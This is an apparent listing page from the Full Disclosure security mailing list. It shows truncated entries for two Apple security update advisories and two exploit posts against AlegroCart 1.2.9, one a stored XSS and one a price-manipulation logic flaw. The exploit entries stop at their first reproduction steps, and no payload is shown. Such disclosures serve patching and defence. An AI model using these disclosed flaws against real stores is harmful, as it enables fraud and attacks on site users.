[FD] APPLE-SA-04-16-2025-2 macOS Sequoia 15.4.1

-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-04-16-2025-2 macOS Sequoia 15.4.1 macOS Sequoia 15.4.1 addresses the following issues. Information about the security content is also available at https://support.apple.com/122400. Apple maintains a Security Releases page at https://suppor

[FD] APPLE-SA-04-16-2025-1 iOS 18.4.1 and iPadOS 18.4.1

-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-04-16-2025-1 iOS 18.4.1 and iPadOS 18.4.1 iOS 18.4.1 and iPadOS 18.4.1 addresses the following issues. Information about the security content is also available at https://support.apple.com/122282. Apple maintains a Security Releases page a

[FD] Stored XSS in "Message" Functionality - AlegroCartv1.2.9

# Exploit Title: Stored XSS in "Message" Functionality - alegrocartv1.2.9 # Date: 04/2025 # Exploit Author: Andrey Stoykov # Version: 1.2.9 # Tested on: Debian 12 # Blog: https://msecureltd.blogspot.com/ Stored XSS #1: Steps to Reproduce: 1. Login as demonstrator account and visit "Customers" >

[FD] Business Logic Flaw: Price Manipulation - AlegroCartv1.2.9

# Exploit Title: Business Logic Flaw: Price Manipulation - alegrocartv1.2.9 # Date: 04/2025 # Exploit Author: Andrey Stoykov # Version: 1.2.9 # Tested on: Debian 12 # Blog: https://msecureltd.blogspot.com/ Business Logic Flaw: Price Manipulation #1: Steps to Reproduce: 1. Visit the store and add

  1   2   3   4   5   6   7   8   9   10   >